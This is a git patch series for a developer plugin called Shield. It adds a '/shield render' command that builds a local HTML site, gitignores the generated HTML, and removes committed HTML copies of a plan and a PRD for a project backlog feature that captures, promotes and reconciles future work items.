Subject: [PATCH 05/10] feat(shield): /shield render command triggers render-output.sh Co-Authored-By: Claude Opus 4.7 (1M context) --- shield/commands/render.md | 37 +++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 shield/commands/render.md diff --git a/shield/commands/render.md b/shield/commands/render.md new file mode 100644 index 00000000..9b4800cd --- /dev/null +++ b/shield/commands/render.md @@ -0,0 +1,37 @@ +--- +name: render +description: Build the browsable Shield HTML site locally from committed Markdown +args: "[output dir — optional, defaults to docs/shield]" +--- + +# Render Shield Output + +Shield commits Markdown + JSON sidecars only. HTML (per-artifact pages and the +browsable dashboard) is a **local build artifact** — gitignored and regenerated +on demand. Run this command to (re)build the site, then open the HTML locally. + +## Usage + +`/shield render` — rebuild the whole site under `docs/shield/` +`/shield render ` — rebuild a site rooted at a custom dir + +## Behavior + +1. Run the build script, which renders every source `.md` to its + `outputs/*.html` and then writes the dashboard (`index.html`) and shared + assets (`manifest.js`, CSS, nav JS): + + ```bash + "$CLAUDE_PLUGIN_ROOT/scripts/render-output.sh" "$ARGUMENTS" + ``` + + (`$ARGUMENTS` is empty for the default `docs/shield/` location.) + +2. Report the built site path and remind the user the output is gitignored — + open `docs/shield/index.html` in a browser to view. + +## Important + +- This command does NOT author or modify any Markdown — it only renders. +- HTML is never committed; do not `git add` anything under `outputs/` or the + generated root assets. From 9f71371585e5ac1910ed711506ebe6352e18196a Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 08:27:16 +0000 Subject: [PATCH 06/10] build(shield): gitignore HTML build artifacts; untrack committed HTML Co-Authored-By: Claude Opus 4.7 (1M context) --- .gitignore | 11 + .../shield/backlog-20260527/outputs/plan.html | 221 ----- docs/shield/backlog-20260527/outputs/prd.html | 392 -------- .../plan/2026-05-27/detailed/agile-coach.html | 308 ------- .../2026-05-27/detailed/backend-engineer.html | 113 --- .../plan/2026-05-27/detailed/dx-engineer.html | 172 ---- .../2026-05-27/detailed/product-manager.html | 196 ---- .../detailed/security-engineer.html | 176 ---- .../reviews/plan/2026-05-27/detailed/sre.html | 129 --- .../plan/2026-05-27/enhanced-plan.html | 274 ------ .../reviews/plan/2026-05-27/summary.html | 235 ----- .../plan/2026-05-29/detailed/agile-coach.html | 133 --- .../2026-05-29/detailed/backend-engineer.html | 99 --- .../plan/2026-05-29/detailed/dx-engineer.html | 159 ---- .../2026-05-29/detailed/product-manager.html | 109 --- .../detailed/security-engineer.html | 170 ---- .../reviews/plan/2026-05-29/detailed/sre.html | 145 --- .../plan/2026-05-29/enhanced-plan.html | 207 ----- .../reviews/plan/2026-05-29/summary.html | 206 ----- .../reviews/prd/2026-05-27/enhanced-prd.html | 316 ------- .../reviews/prd/2026-05-27/summary.html | 241 ----- .../prd/2026-05-27_2/enhanced-prd.html | 364 -------- .../reviews/prd/2026-05-27_2/summary.html | 203 ----- docs/shield/backlog-20260527/outputs/trd.html | 531 ----------- .../outputs/research.html | 324 ------- docs/shield/index.html | 33 - docs/shield/manifest.js | 161 ---- .../outputs/plan-architecture.html | 162 ---- .../outputs/plan.html | 430 --------- .../outputs/research.html | 837 ------------------ .../plan/2026-05-25/detailed/agile-coach.html | 165 ---- .../plan/2026-05-25/detailed/architect.html | 149 ---- .../2026-05-25/detailed/backend-engineer.html | 165 ---- .../plan/2026-05-25/detailed/dx-engineer.html | 216 ----- .../reviews/plan/2026-05-25/detailed/sre.html | 148 ---- .../plan/2026-05-25/enhanced-plan.html | 396 --------- .../reviews/plan/2026-05-25/summary.html | 411 --------- docs/shield/shield-dashboard.js | 62 -- docs/shield/shield-nav.js | 160 ---- docs/shield/shield.css | 81 -- .../scripts/test_gitignore_html_artifacts.py | 29 + 41 files changed, 40 insertions(+), 8999 deletions(-) delete mode 100644 docs/shield/backlog-20260527/outputs/plan.html delete mode 100644 docs/shield/backlog-20260527/outputs/prd.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html delete mode 100644 docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html delete mode 100644 docs/shield/backlog-20260527/outputs/trd.html delete mode 100644 docs/shield/devcontainer-implement-20260518/outputs/research.html delete mode 100644 docs/shield/index.html delete mode 100644 docs/shield/manifest.js delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/plan.html delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/research.html delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html delete mode 100644 docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html delete mode 100644 docs/shield/shield-dashboard.js delete mode 100644 docs/shield/shield-nav.js delete mode 100644 docs/shield/shield.css create mode 100644 shield/scripts/test_gitignore_html_artifacts.py diff --git a/.gitignore b/.gitignore index b091540e..c8a5a65a 100644 --- a/.gitignore +++ b/.gitignore @@ -41,3 +41,14 @@ shield/tests/output/ # outputs/, and reviews/ (see docs/superpowers/plans/2026-05-22-shield-output- # structure-cutover.md). Only the hidden Q&A scratch transcript is disposable. **/docs/shield/*/.session-transcript.md + +# Shield HTML is a BUILD ARTIFACT, not a source. Markdown + JSON sidecars are +# the committed source of truth. Regenerate the site locally with /shield +# render (scripts/render-output.sh). See docs/superpowers/specs/ +# 2026-06-08-shield-single-canonical-output-design.md +**/docs/shield/*/outputs/ +**/docs/shield/index.html +**/docs/shield/manifest.js +**/docs/shield/shield.css +**/docs/shield/shield-nav.js +**/docs/shield/shield-dashboard.js diff --git a/docs/shield/backlog-20260527/outputs/plan.html b/docs/shield/backlog-20260527/outputs/plan.html deleted file mode 100644 index 57e67c4b..00000000 --- a/docs/shield/backlog-20260527/outputs/plan.html +++ /dev/null @@ -1,221 +0,0 @@ - - - - - -Plan — backlog-20260527 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - - -

Plan — Shield Backlog

-

Project: Shield · Phase: v1 · Domain: backend (Python) -PRD: ./prd.md (reviewed Ready, composite 3.12) · TRD: ./trd.md · Sidecar: ./plan.json

-

A project-level Shield backlog: capture (user/agent) → user-driven promotion → reconciliation. Entries are removed when their work commits — eagerly at the end of a promoted /plan or /implement run, lazily on the /backlog view sweep, or manually. Matching is by feature (manifest.json index) + epic (plan.json gate); no ids are stamped. This re-plan folds the 2026-05-27 plan-review findings (P0 gate-0d, the P1/P2 set) into the stories and adds the previously-deferred 14-section TRD plus three component LLD drafts.

-

Milestones

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
IDNameDepends onTouches LLDOutcome
M1Capture + store + viewbacklog-storebacklog.json + schema/validator; capture (user + skill, atomic, validate-or-refuse); /backlog ordered view with manifest status badges; manual remove.
M2Feature + epic association + suggestionM1epic-suggesterEvery entry carries feature + epic (existing or proposed-new); agent suggests via exact-normalized match; user accept/replace/create-new.
M3Promotion + reconciliationM2reconcilerPromotion via transient reference; reconciliation engine (single "epic landed" predicate matching by epic name, never-remove-on-doubt, drift tolerance, removal logging); eager + lazy idempotent triggers + kill switch (incl. shield.schema.json backlog key); eval suite + version bump.
-

LLD drafts emitted by this plan (feature-folder, net-new): lld-backlog-store.md, lld-epic-suggester.md, lld-reconciler.md.

-
-

EPIC-1 — Store, schema & capture (M1)

-

EPIC-1-S1 · Define backlog.json schema and validator (high)

-

Define backlog.json shape + JSON Schema with a top-level schema_version, plus a Python validator. Entry: {id, order:int, kind∈{epic,story,task}, source∈{user,agent}, feature, epic, text}. schema_version is set now so future shape changes migrate read-old/write-new.

-
    -
  • Tasks: author shield/schema/backlog.schema.json; specify the id contract (uuid4 string; uniqueness across entries[] enforced by the validator, not the JSON Schema — P1-2 — since draft 2020-12 can't express property-level array uniqueness); document entry shape, migration policy, and the manifest features[].name == folder-slug invariant (P1-3) in shield/skills/general/backlog/SKILL.md; create shield/scripts/validate_backlog.py; ordering = single integer order; migration is doc-only until schema_version 2.
  • -
  • AC: schema rejects unknown kind (named error); the validator rejects duplicate id values (duplicate_entry_id); validate_backlog.py exits 0/non-zero correctly; schema_version + migration policy + name==slug invariant documented; enums constrained; id is a uuid4 string.
  • -
  • Design: §11 APIs Involved · LLD backlog-store §4 Data model
  • -
-

EPIC-1-S2 · Capture entrypoint (user + skill) with atomic write (high)

-

Capture usable by the user (/backlog add) and any skill (documented capture() write helper). Atomic temp-then-rename + validate-or-refuse so concurrent capture vs reconciliation can't corrupt the file. Resolves PRD-review P1 (capture interface); closes TRD §12 Q3.

-
    -
  • Tasks: /backlog add (assigns next order + uuid4 id); LOCKED write-helper signature capture(text: str, *, kind: str = "task", feature: str | None = None, epic: str | None = None, source: str) -> str in shield/scripts/backlog_store.py, raising BacklogInvalid (pinned TRD §11); LOCKED single-writer (no lock) → full doc → .tmpos.replace() (TRD §6 N1); + compare-before-replace (P1-1/security): refuse os.replace() if the on-disk store changed since read → loud BacklogInvalid, no lost entry; package backlog_store with a pyproject.toml (P1-4 — skills import capture()); validate-or-refuse on read and write.
  • -
  • AC: user + skill capture both work; interface documented + pinned in TRD §11; mid-write kill leaves no corruption; a concurrent on-disk change between read and replace is refused with BacklogInvalid (no lost entry); next order/uuid4 id/default kind assigned; malformed/partial backlog.json on read is refused with BacklogInvalid, never silently read or truncated.
  • -
  • Design: §5 Functional Requirements · LLD backlog-store §5 API contracts
  • -
-

EPIC-1-S3 · /backlog view — ordered list (high)

-

/backlog command + skill rendering entries sorted by order with feature + epic + source.

-
    -
  • Tasks: author shield/commands/backlog.md + backlog/SKILL.md; render sorted by order; define the per-entry render-line format once in the SKILL.md (canonical badge string lives in EPIC-2-S1) so every view path renders identically; document a local-dev/dry-run loop; empty-backlog message.
  • -
  • AC: ascending-order list with feature/epic/source; clean empty message; command registered; render-line format documented once and reused.
  • -
  • Design: §4 Product Journey
  • -
-

EPIC-1-S4 · Manual remove from /backlog (medium)

-

/backlog remove <id> — plain delete for ideas decided against / entries no run will clear.

-
    -
  • Tasks: remove <id> via atomic helper; confirm-before-delete; clear error on absent id; document the recoverability boundary (git revert covers only committed entries; uncommitted manual remove is unrecoverable by design — N4).
  • -
  • AC: deletes + persists atomically; absent id = clear no-op error; no history retained; uncommitted-entry recoverability caveat documented.
  • -
  • Design: §5 Functional Requirements · LLD backlog-store §5 API contracts
  • -
-
-

EPIC-2 — Association & pipeline status

-

EPIC-2-S1 · Per-entry pipeline status from manifest.json (high, M1)

-

/backlog view shows each entry's feature pipeline status (research/prd/plan) read live from manifest.json — so "prd done, not yet planned" is visible without removal.

-
    -
  • Tasks: read manifest; render status badges per entry; pin the canonical badge string research ✓ prd ✓ plan – in the SKILL.md; not started when feature absent; compute at view time (no stored status).
  • -
  • AC: badges derived from manifest using the pinned string; prd-but-no-plan shows prd ✓ plan – and stays; absent feature → not started.
  • -
  • Design: §7 High-Level Design
  • -
-

EPIC-2-S2 · Feature + epic association + agent suggestion (high, M2)

-

Associate every entry with a feature (reconciliation key) + epic (removal gate), either proposed-new; agent suggests feature (manifest) + epic (plan.json); user accept/replace/create-new.

-
    -
  • Tasks: prompt/accept feature + epic (allow proposed-new); LOCKED match key = exact normalized (casefold() + collapsed whitespace); UPDATED (P0-2): both existing and proposed-new epics match by exact normalized NAME (epic id EPIC-N is a positional within-plan slot, not a cross-plan key), no fuzzy ranking (TRD §5 F7/F8); suggestion typed against the real shapes (P0-1): suggest_feature reads manifest.features[].name, suggest_epic reads plans[feature].epics[] (plans = dict[slug→plan], path derived); never block capture; a tie (≥2 matches) surfaces all and auto-picks none.
  • -
  • AC: every entry has feature + epic; ≥1 feature + ≥1 epic candidate proposed when matches exist; auth fixture surfaces auth top candidate + 2-way tie auto-picks neither; a suggested feature value resolves to an existing docs/shield/<value>/ path; capture succeeds with proposed-new when none.
  • -
  • Design: §5 Functional Requirements · LLD epic-suggester §5 API contracts
  • -
-
-

EPIC-3 — Promotion & reconciliation (M3)

-

EPIC-3-S1 · User-driven promotion with transient reference (high)

-

/backlog promote <id> launches the user-chosen step (/research//prd//plan//implement) and passes the entry id as a transient runtime reference — never stamped into plan.json.

-
    -
  • Tasks: promote <id> affordance; forward id as transient reference; document non-persistence; shippable work routes through /plan, direct /implement for rare planless one-offs.
  • -
  • AC: promotion starts the chosen step + forwards the reference; reference not persisted to plan.json/stories (F6); tool never auto-routes.
  • -
  • Design: §4 Product Journey
  • -
-
-

Intra-epic dependency: EPIC-3-S3 (triggers) consumes both EPIC-3-S1 (transient reference) and EPIC-3-S2 (engine) and must land after them.

-
-

EPIC-3-S2 · Reconciliation engine (match key + never-remove-on-doubt) (high)

-

Locate feature in manifest.json; if it has a plan.json, apply the single "epic landed" predicate (TRD §5 F8): remove iff an epic with the matching normalized-exact name is present in plan.json.epics[] — story status is never consulted. Ambiguity/no-match → entry stays. Unknown manifest/plan shapes → doubt (stays), never crash.

-
    -
  • Tasks: shield/scripts/reconcile_backlog.py with reconcile(entry, *, manifest: dict, plans: dict[str,dict]) -> RemovalDecision (pure fn; manifest = list-keyed features[], plans = {slug→plan} with path derived — P0-1); UPDATED (P0-2) match key = epic by casefold+collapsed-ws exact name for both existing and proposed-new (never by positional EPIC-N id; a re-planned reorder must still resolve); tie/no-match → stays; story status never consulted; never-remove-on-doubt; drift tolerance with logged warning; define RemovalDecision + log every removal {entry id, feature, epic, match-kind (name), triggering run, gating plan.json path}.
  • -
  • AC: removed only when an epic with normalized-exact name is present in plan.json.epics[] (story status not consulted), prd-only not; a re-planned epic reorder (same name, new EPIC-N) still resolves; epic-name collision across two features → ambiguous → entry stays; malformed/old shapes → entry stays (logged), no exception; every removal emits the structured log line.
  • -
  • Design: §7 High-Level Design · LLD reconciler §6 Sequence flows
  • -
-

EPIC-3-S3 · Eager + lazy removal triggers (idempotent) + kill switch (high)

-

Eager prune at end of promoted /plan//implement (via the transient reference); lazy sweep on /backlog view. Both idempotent; both call the one reconciliation engine. Ships the kill switch and closes the uncommitted-state recovery gap. Lands after EPIC-3-S1 + EPIC-3-S2.

-
    -
  • Tasks: eager prune hook at end of /plan + /implement; lazy sweep on view; idempotent remove-if-present + shared engine; kill switch .shield.json backlog.auto_reconcile (default true) disabling eager + lazy (§14 rollback fallback) — requires an additive backlog object in shield/schemas/shield.schema.json (P0-3; current schema is additionalProperties:false); RESOLVED (P1-1) the single recovery mechanism is append-to-.shield/backlog-removed.log before the destructive prune (commit-before-prune is a non-goal); no-op prune writes no log/recovery record; instrument the N2 ~1s budget with a debug-gated latency line (WARN > 1s).
  • -
  • AC: promotion removes referenced entry at end of run (eager); sweep removes plan-committed entries (lazy); second pass is a no-op (idempotent); shared engine; backlog.auto_reconcile=false (now schema-valid) disables both, leaving manual-remove; end-of-run prune appends to .shield/backlog-removed.log before remove; replay restores the entry; debug latency line reports view+sweep wall time + WARN above 1s.
  • -
  • Design: §7 High-Level Design · LLD reconciler §8 Concurrency & state
  • -
-
-

EPIC-4 — Eval coverage & release (M3)

-

EPIC-4-S1 · Executable evals for the backlog lifecycle (RED→GREEN) (high)

-

Per CLAUDE.md eval mandate: cover capture (user + skill), view + status, manual remove, eager prune, lazy sweep, match-key, never-remove-on-doubt, concurrency (no lost entry), no-stamping (F6), recovery-rehearsal.

-
    -
  • Tasks: fixtures from the real artifact schemas (P0-1: list-keyed manifest.features[], boolean plan_json flag) covering prd-only-stays, plan-committed-removed, ambiguous-stays (epic-name collision across features), malformed-stays, re-planned-epic-reorder-still-resolves (same name, new EPIC-N — P0-2); evals incl. duplicate-id rejection; concurrency/lost-update eval (P1-1: a concurrent on-disk change between read and os.replace() is refused with BacklogInvalid — no corruption, no lost entry); write-side eval (P1-b: capture() producing a schema-invalid doc refuses, byte-unchanged); no-stamping eval (F6); recovery-rehearsal eval (P1-c: crash at the ordering seam — after log-append, before remove — still recoverable via replay); name a concrete CI entrypoint (the actual workflow file + runner) + path-filter glob (shield/{schema,scripts,skills/general/backlog}/**, shield/commands/backlog.md).
  • -
  • AC: suite under shield/evals/ covers all listed behaviors (incl. re-plan reorder, lost-update detection, write-side refusal, ordering-seam recovery); fixtures use real manifest/plan shapes; self-contained (no API/LLM); PR body has RED + GREEN; the named CI workflow runs on the backlog-asset glob.
  • -
  • Design: §10 Milestones
  • -
-

EPIC-4-S2 · Version bump + command/skill docs (medium)

-

Bump the Shield plugin version (marketplace.json + pyproject where touched) in the same commit as asset changes; finalize /backlog + backlog SKILL.md docs.

-
    -
  • Tasks: bump marketplace.json; bump backlog_store pyproject.toml (unconditional — P1-4, it's a packaged module); commit the shield/schemas/shield.schema.json backlog change (P0-3) in the same commit; finalize command/skill docs (capture, three triggers, kill switch, name match key, manual remove, badges, wrong-removal recovery procedure); document a fixed monthly /backlog audit with the concrete PRD §7 revisit triggers (<70% terminal in 30d, or >20% untouched >60d); add explicit DoD lines ("PR reviewed and merged", "marketplace version published"); CHANGELOG.
  • -
  • AC: version bumped in marketplace.json + backlog_store pyproject.toml and the shield.schema.json change committed, all in one commit; command + SKILL document capture/view/promote/remove + 3 triggers + kill switch + recovery procedure + fixed monthly audit with numeric triggers; explicit DoD lines present; CHANGELOG mentions the feature.
  • -
  • Design: §13 References
  • -
-
-

Validate the bet from v1 data (P1 — PM10, decided 2026-05-27)

-

No pre-build baseline gate. The load-bearing assumption (PRD §10: lost future-work volume is high enough to justify the tool) is accepted for v1 and validated after M1 ships, from backlog.json's own add/remove git history over the first 30 days (the §7 success metric). If that data shows the backlog isn't earning its keep, revisit scope before investing further in M2/M3.

-

Carried forward from PRD-review (Ready, run _2)

-
    -
  • Capture-from-skill interface defined → EPIC-1-S2 / TRD §11 (closed — F3 signature locked).
  • -
  • backlog.json schema_version + migration → EPIC-1-S1 / TRD §9.
  • -
  • Reconciliation read-contract drift tolerance → EPIC-3-S2 / TRD §6 N3.
  • -
  • Eager-prune + lazy-sweep idempotency → EPIC-3-S3 / TRD §5 F9.
  • -
-

Next steps

-
    -
  • /plan-review — re-run multi-agent review on the refreshed plan + new TRD.
  • -
  • /pm-sync — sync epics + stories to ClickUp.
  • -
  • /implement — begin TDD implementation at M1 / EPIC-1-S1.
  • -
- -
-
Generated by Shield
- - diff --git a/docs/shield/backlog-20260527/outputs/prd.html b/docs/shield/backlog-20260527/outputs/prd.html deleted file mode 100644 index 928f91ec..00000000 --- a/docs/shield/backlog-20260527/outputs/prd.html +++ /dev/null @@ -1,392 +0,0 @@ - - - - - -PRD — backlog-20260527 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

Shield Backlog

-

1. Header

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
FieldValue
Owner@ashwinimanoj
StatusDraft
PRD typeLean
Date created2026-05-27
Last updated2026-05-27
Linked design specnull
Linked researchnull
Decision-maker@ashwinimanoj
Sign-off contacts(n/a for internal tooling)
Linked plans(auto-populated by /plan)
-

2. Terminologies

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
TermDefinition
BacklogA project-level, ordered list of future work captured across the Shield workflow. Lives at docs/shield/backlog.json.
Backlog entryOne captured idea — a future epic, story, or task. May not be actionable when captured. Carries an order, a kind hint (epic | story | task), a source (user | agent), and a feature + epic association (either may be proposed-new until promotion).
Feature associationThe feature an entry belongs to (a docs/shield/<feature>/ folder). It is the reconciliation key: manifest.json is keyed by feature, so this is how an entry is matched to its pipeline progress. May be proposed-new until promotion.
Epic associationThe epic an entry slots into when planned — an existing epic id (e.g. EPIC-2) or a proposed new epic. Acts as the gate at reconciliation: the entry is removed when this epic's work appears in the feature's plan.json (or removed manually — see §9).
PromotionActing on a backlog entry by starting the appropriate Shield step for it — /research, /prd, /plan, or /implement. The user decides which step; the backlog does not auto-route.
ReconciliationKeeping the backlog current: manifest.json locates the entry's feature and whether it has a plan.json; if so, the entry's epic is looked up there. The entry is removed once its epic's work appears in the feature's plan.json (epics[].stories[]). No ids are stamped — matching is by feature (manifest) + epic (plan): an existing-epic entry matches by epic id, a proposed-new-epic entry matches by epic name (names expected stable). On any ambiguity or no match, the entry stays — reconciliation never removes on doubt. A prd-only feature does not trigger removal. Removal fires at the end of the /plan or /implement run promoted from the entry, or on the /backlog view sweep.
Agent-discovered entryA backlog entry the agent adds on its own when it notices future work mid-task (vs. a user-created entry).
-

3. Problem & context

-

Future work surfaces constantly while using Shield — during /research, while writing a PRD, mid-/plan, and especially during /implement ("we should also handle X later", "this whole area needs a rewrite"). Today there is nowhere to park that work. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.

-

Concretely:

-
    -
  • There is no project-level, ordered place to capture "not now, but later" items. plan.json only holds work already committed to a milestone; manifest.json is an artifact index. Neither captures un-triaged future work.
  • -
  • Ideas discovered by the agent mid-task have no home — they're mentioned once in conversation and gone.
  • -
  • When future work is remembered, there's no consistent path from "loose idea" to "stories in a plan." Each pickup re-derives the epic, the feature, and the scope from scratch.
  • -
-

Why now: Shield's pipeline (/research → /prd → /plan → /implement) is mature, but it only handles work that's already been decided on. The gap is the staging area before that pipeline — where future work waits, ordered, until the user promotes it in.

-

4. Target users / personas

- - - - - - - - - - - - - - - - - - - - - - - -
IDPersonaGoalsFrictions today
P1Ashwini — Shield maintainer running /research//plan//implement dailyCapture future work without losing focus on the current task; come back later to an ordered list of what to pick up nextFuture ideas get lost or derail the current task; no ordered "later" list at the project level
P2The agent (Claude) running a Shield taskRecord follow-up work it discovers mid-task so the human doesn't have to remember itDiscovered work is mentioned once in chat then forgotten; no place to persist it
-

5. Architecture & flows

-

A single global store docs/shield/backlog.json (sibling to manifest.json), a /backlog command to view it, a capture path usable from any Shield skill or by the user, and a user-driven promotion: the user picks an entry and starts whichever Shield step fits — /research, /prd, /plan, or /implement. Each entry carries an order, a source (user | agent), and a feature + epic association. Reconciliation reads manifest.json as the project-level index — to find each entry's feature, see whether it has a plan.json, and surface its pipeline status (research/prd/plan) in the /backlog view — then opens the flagged plan.json and removes any entry whose epic's work now appears there. A prd-only feature stays in the backlog; only committed work is removed. No ids are tracked. An entry promoted via /plan or /implement is pruned at the end of that run (the command carries the entry as a transient promotion reference); the /backlog view sweep is the lazy safety net for work that landed without an explicit reference; and a manual remove clears ideas decided against or anything not tied to a promotion run.

-
flowchart LR
-  cap["Capture<br/>(user or agent, anytime)"] --> bl["backlog.json<br/>(ordered, project-level)"]
-  bl --> view["/backlog<br/>(ordered list +<br/>per-entry pipeline status)"]
-  man["manifest.json<br/>(feature index:<br/>research/prd/plan)"] --> view
-  bl --> dec{"User decides<br/>next step"}
-  dec --> research["/research"]
-  dec --> prd["/prd"]
-  dec --> plan["/plan"]
-  dec --> impl["/implement"]
-  man --> rec["Reconcile → remove from backlog:<br/>end of promoted /plan or /implement,<br/>or /backlog sweep (work now in plan.json)"]
-  plan --> rec
-  impl --> rec
-  rec --> bl
-
-

6. Goals & non-goals

-

Goals

-
    -
  • Capture future work (epic / story / task granularity) at any point in the workflow — before a PRD exists, during planning, during implementation — without derailing the current task.
  • -
  • Support both capture sources: user-created and agent-discovered.
  • -
  • Keep the backlog ordered so there's a clear "what to pick up next."
  • -
  • Every entry is associated with a feature and an epic — existing or proposed-new — and the agent suggests a matching feature/epic at capture or promotion time.
  • -
  • A /backlog command shows the current backlog, ordered, with each entry's feature + epic association, source, and pipeline status (research / prd / plan, read from manifest.json) — so you can see what's been started (e.g. a prd written) without the entry being removed.
  • -
  • Provide a user-driven promotion path: the user picks an entry and starts the Shield step they judge appropriate (/research, /prd, /plan, or /implement). The backlog suggests, but does not dictate, the next step.
  • -
  • Keep the backlog current: an entry promoted via /plan or /implement is removed at the end of that run; the /backlog view also sweeps out any entry whose work has since landed in a plan.json. The backlog reflects only not-yet-committed work.
  • -
  • Manual remove: any entry can be explicitly removed from /backlog — covers ideas decided against and entries not cleared by a promotion run.
  • -
-

Non-goals

-
    -
  • Automatic end-of-task surfacing machinery (hooks). The agent already calls out new entries conversationally; no dedicated surfacing mechanism in v1.
  • -
  • Per-feature backlogs. v1 is a single global backlog.
  • -
  • A status/workflow engine. The lifecycle is minimal: an entry exists until it is removed — at the end of the /plan or /implement it was promoted from, by the /backlog sweep once its work is in a plan.json, or manually. No multi-state machine.
  • -
  • Syncing the backlog to the PM tool (ClickUp/Jira/etc.). The backlog is a pre-pipeline staging area; PM sync happens after promotion, via the existing /pm-sync on the resulting plan.
  • -
  • Replacing the PM tool's own backlog. This is Shield-local triage, not a project-management backlog of record.
  • -
-

7. Success metrics

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
MetricTypeTargetCounter
Captured entries that get acted on (work started, or removed once it lands in a plan) vs. left to rotOutcome≥70% reach a terminal state (promoted/landed in a plan, or explicitly dropped) within 30 days; <20% sit untouched >60 daysEntries pile up un-triaged → backlog becomes a graveyard
Entries carrying a feature + epic association at promotion timeQuality100% — promotion cannot complete without a feature and epicForcing association makes capture so heavy nobody captures
Agent feature/epic-suggestion acceptanceQuality≥60% of agent feature/epic suggestions accepted without overrideBad suggestions that users routinely override
Capture frictionAdoptionCapture is a single /backlog add (or one agent action) and never blocks the current taskCapture is so quick the backlog fills with low-signal noise
-

Measurement (v1): no telemetry — metrics are tracked manually via a periodic /backlog audit and the git history of backlog.json (entry add/remove commits). Owner: @ashwinimanoj.

-

8. Milestones

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
IDNameOutcomeExit criteriaDepends on
M1Capture + store + viewA global backlog.json exists; entries can be added (user + agent) with order, source, and feature + epic association; /backlog shows the ordered list with per-entry pipeline status from manifest.jsonbacklog.json schema defined; an entry can be captured from a skill or by the user; /backlog renders the ordered backlog with feature + epic and a research/prd/plan status read from manifest.json; an entry can be manually removed from /backlog
M2Feature + epic association + suggestionEvery entry references a feature and an epic (existing or proposed new); the agent suggests a matching feature/epicCapture prompts for a feature + epic; agent scans manifest.json features and known epics and proposes a match; user can accept, pick another, or create-newM1
M3Promotion + reconciliationThe user picks an entry and starts the Shield step they choose (/research, /prd, /plan, or /implement); once the entry's epic's work appears in the feature's plan.json, it is removed from the backlogReconciliation uses manifest.json (find feature, has-plan?) + plan.json (epic present?) — no ids stamped; a prd-only feature is not removed; removal fires eagerly at the end of the /plan or /implement run promoted from the entry and lazily on the /backlog sweep; the user-chosen step is never overriddenM2
-

9. Open questions

-

Decided (locked for v1)

-
    -
  • Reconciliation triggers: an entry is removed (a) eagerly at the end of the /plan or /implement run it was promoted from — the entry id is passed to the command as a transient promotion reference, and the entry is pruned on success; and (b) lazily by the /backlog view sweep, which prunes any entry whose epic's work is now in a plan.json (the safety net for work that landed without an explicit reference). The promotion reference is a runtime command argument, not an id stamped into plan.json.
  • -
  • Reconciliation match key: feature (via manifest.json) + epic. Existing-epic entries match by epic id; proposed-new-epic entries match by epic name (names expected stable). On ambiguity or no match, the entry stays — reconciliation never removes on doubt.
  • -
  • Ordering scheme: a single explicit integer order field per entry (like orderindex); no priority buckets in v1.
  • -
  • Entry granularity: entries carry a kind hint (epic | story | task); promotion always yields ≥1 story regardless of kind.
  • -
  • Shippable work routes through /plan: anything that produces stories is promoted via /plan so it lands in plan.json (the lazy-sweep signal) and is pruned at the end of that /plan run. Direct /implement stays available for rare tiny planless changes; when promoted from an entry, that entry is pruned at the end of the /implement run too.
  • -
